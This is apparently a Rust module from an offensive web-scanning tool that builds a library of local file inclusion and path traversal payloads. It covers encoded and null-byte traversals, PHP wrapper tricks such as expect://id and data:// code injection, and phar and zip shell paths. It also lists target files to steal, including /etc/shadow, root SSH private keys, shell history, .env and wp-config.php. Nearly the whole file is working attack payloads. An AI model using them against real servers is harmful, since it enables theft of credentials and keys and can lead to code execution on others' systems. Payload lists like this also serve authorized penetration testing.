/// LFI/path traversal payload library.
pub struct Lfi;

impl Lfi {
    /// Core traversal payloads covering Unix, Windows, encoding variants.
    pub fn get_payloads() -> Vec<String> {
        let mut p = Vec::new();

        // ── Unix relative traversal ──────────────────────────────────────────
        for depth in 3..=8 {
            p.push(format!("{}etc/passwd", "../".repeat(depth)));
        }

        // ── URL-encoded variants ─────────────────────────────────────────────
        p.push("..%2f..%2f..%2fetc%2fpasswd".to_string());
        p.push("..%252f..%252f..%252fetc%252fpasswd".to_string());
        p.push("%2e%2e/%2e%2e/%2e%2e/etc/passwd".to_string());
        p.push("%252e%252e/%252e%252e/%252e%252e/etc/passwd".to_string());

        // ── Dot-dot with extra dots ──────────────────────────────────────────
        p.push("....//....//....//etc/passwd".to_string());
        p.push("..../....//..../etc/passwd".to_string());

        // ── Null byte (PHP < 5.3.4) ──────────────────────────────────────────
        p.push("../../../etc/passwd%00".to_string());
        p.push("../../../etc/passwd%00.jpg".to_string());
        p.push("../../../etc/passwd%00.php".to_string());

        // ── Windows ──────────────────────────────────────────────────────────
        p.push("..\\..\\..\\windows\\win.ini".to_string());
        p.push("..%5c..%5c..%5cwindows%5cwin.ini".to_string());
        p.push("../../../windows/win.ini".to_string());
        p.push("../../../windows/system32/config/sam".to_string());

        // ── PHP wrappers ─────────────────────────────────────────────────────
        p.push("php://filter/convert.base64-encode/resource=/etc/passwd".to_string());
        p.push("php://filter/read=convert.base64-encode/resource=/etc/passwd".to_string());
        p.push("php://filter/read=string.rot13/resource=/etc/passwd".to_string());
        p.push("php://input".to_string());

        // ── PHP filter chain (RCE via iconv) — requires POST body ────────────
        // The actual chain is generated by get_filter_chain_rce()

        // ── Other URI schemes ────────────────────────────────────────────────
        p.push("file:///etc/passwd".to_string());
        p.push("file://localhost/etc/passwd".to_string());
        p.push("expect://id".to_string());
        p.push("data://text/plain,<?php phpinfo(); ?>".to_string());
        p.push("data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==".to_string());

        // ── Phar deserialization ─────────────────────────────────────────────
        p.push("phar:///var/www/html/upload/shell.jpg/shell.php".to_string());

        // ── Zip wrapper ──────────────────────────────────────────────────────
        p.push("zip:///var/www/html/upload/shell.zip#shell.php".to_string());

        p
    }

    /// High-value Linux files for LFI exploitation.
    pub fn get_linux_files() -> Vec<String> {
        vec![
            // System
            "/etc/passwd".to_string(),
            "/etc/shadow".to_string(),
            "/etc/group".to_string(),
            "/etc/hosts".to_string(),
            "/etc/hostname".to_string(),
            "/etc/issue".to_string(),
            "/etc/motd".to_string(),
            "/etc/resolv.conf".to_string(),
            "/etc/crontab".to_string(),
            "/etc/sudoers".to_string(),
            // SSH
            "/etc/ssh/sshd_config".to_string(),
            "/root/.ssh/id_rsa".to_string(),
            "/root/.ssh/id_ecdsa".to_string(),
            "/root/.ssh/authorized_keys".to_string(),
            "/home/www-data/.ssh/id_rsa".to_string(),
            // Shell history
            "/root/.bash_history".to_string(),
            "/root/.zsh_history".to_string(),
            // Web server configs
            "/etc/apache2/apache2.conf".to_string(),
            "/etc/apache2/sites-enabled/000-default.conf".to_string(),
            "/etc/nginx/nginx.conf".to_string(),
            "/etc/nginx/sites-enabled/default".to_string(),
            "/etc/php/8.1/apache2/php.ini".to_string(),
            "/etc/php/7.4/apache2/php.ini".to_string(),
            // Database
            "/etc/mysql/my.cnf".to_string(),
            "/etc/mysql/mysql.conf.d/mysqld.cnf".to_string(),
            // Proc
            "/proc/version".to_string(),
            "/proc/self/environ".to_string(),
            "/proc/self/cmdline".to_string(),
            "/proc/self/status".to_string(),
            "/proc/mounts".to_string(),
            "/proc/net/tcp".to_string(),
            "/proc/net/udp".to_string(),
            "/proc/net/arp".to_string(),
            // Logs (useful for log poisoning)
            "/var/log/apache2/access.log".to_string(),
            "/var/log/apache2/error.log".to_string(),
            "/var/log/nginx/access.log".to_string(),
            "/var/log/nginx/error.log".to_string(),
            "/var/log/httpd/access_log".to_string(),
            "/var/log/auth.log".to_string(),
            "/var/log/syslog".to_string(),
            "/var/log/mail.log".to_string(),
            "/var/log/vsftpd.log".to_string(),
            // App configs
            "/var/www/html/.env".to_string(),
            "/var/www/html/config.php".to_string(),
            "/var/www/html/wp-config.php".to_string(),
            "/var/www/html/configuration.php".to_string(),
            "/var/www/html/config/database.php".to_string(),
        ]
    }

}
